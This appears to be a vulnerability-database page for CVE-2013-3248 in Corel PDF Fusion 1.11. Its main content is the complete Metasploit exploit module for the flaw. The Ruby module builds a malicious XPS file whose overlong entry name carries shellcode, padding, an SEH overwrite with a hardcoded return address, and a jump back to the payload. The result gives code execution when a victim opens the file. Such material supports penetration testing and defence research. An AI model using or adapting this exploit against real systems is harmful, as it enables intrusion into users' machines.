Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Corel PDF Fusion Stack Buffer Overflow

🗓️ 11 Jul 2013 17:30:08Reported by Kaveh Ghaemmaghami, juan vazquez <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 56 Views

Corel PDF Fusion Stack Buffer Overflow in version 1.11 handling long entry names, allowing attacker to execute arbitrary code with specially crafted XPS fil

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Corel PDF Fusion Stack Buffer Overflow Vulnerability
12 Jul 201300:00
zdt
Circl		CVE-2013-3248
13 Jul 201300:00
circl
Check Point Advisories		Corel PDF Fusion XPS Stack Buffer Overflow (CVE-2013-3248)
4 Nov 201300:00
checkpoint_advisories
CVE		CVE-2013-3248
3 Oct 201323:00
cve
Cvelist		CVE-2013-3248
3 Oct 201323:00
cvelist
Exploit DB		Corel PDF Fusion - Local Stack Buffer Overflow (Metasploit)
13 Jul 201300:00
exploitdb
NVD		CVE-2013-3248
3 Oct 201323:55
nvd
OpenVAS		Corel PDF Fusion 1.11 Multiple Vulnerabilities - Windows
15 Oct 201300:00
openvas
Packet Storm		Corel PDF Fusion Stack Buffer Overflow
12 Jul 201300:00
packetstorm
Prion		Design/Logic Flaw
3 Oct 201323:55
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Corel PDF Fusion Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability in version 1.11 of
        Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry
        names. In order for the payload to be executed, an attacker must convince the target
        user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the
        attacker can execute arbitrary code as the target user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Kaveh Ghaemmaghami', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3248' ],
          [ 'OSVDB', '94933' ],
          [ 'BID', '61010' ],
          [ 'URL', 'http://web.archive.org/web/20130720043800/http://secunia.com:80/advisories/52707/' ]
        ],
      'Platform'       => [ 'win' ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space' => 4000
        },
      'Targets'        =>
        [
          # Corel PDF Fusion 1.11 (build 2012/04/25:21:00:00)
          # CorelFusion.exe 2.6.2.0
          # ret from unicode.nls # call dword ptr ss:[ebp+0x30] # tested over Windows XP SP3 updates
          [ 'Corel PDF Fusion 1.11 / Windows XP SP3', { 'Ret' => 0x00280b0b, 'Offset' => 4640 } ]
        ],
      'DisclosureDate' => '2013-07-08',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.xps'])
      ])

  end


  def exploit
    template = [
      "[Content_Types].xml",
      "_rels/.rels",
      "docProps/thumbnail.jpeg",
      "docProps/core.xml",
      "FixedDocSeq.fdseq",
      "Documents/1/Pages/_rels/1.fpage.rels",
      "Documents/1/_rels/FixedDoc.fdoc.rels",
      "Documents/1/FixedDoc.fdoc",
      "Documents/1/Structure/Fragments/1.frag",
      "Documents/1/Structure/DocStructure.struct",
      "Documents/1/Pages/1.fpage",
    ]

    xps = Rex::Zip::Archive.new
    template.each do |k|
      xps.add_file(k, rand_text_alpha(10 + rand(20)))
    end

    resources_length = "Resources/".length
    sploit = "Resources/"
    sploit << payload.encoded
    sploit << rand_text(target['Offset'] - sploit.length)
    sploit << generate_seh_record(target.ret)
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8 - resources_length}").encode_string # 8 => seh_record length
    sploit << rand_text(1500) # Trigger exception

    xps.add_file(sploit, rand_text_alpha(10 + rand(20)))

    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(xps.pack)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Mar 2023 10:43Current
8High risk
Vulners AI Score8
CVSS 29.3
EPSS0.18563
corel pdf fusionstack buffer overflowvulnerability discoverymetasploit modulecve-2013-3248osvdb-94933bid-61010windows xp sp3
56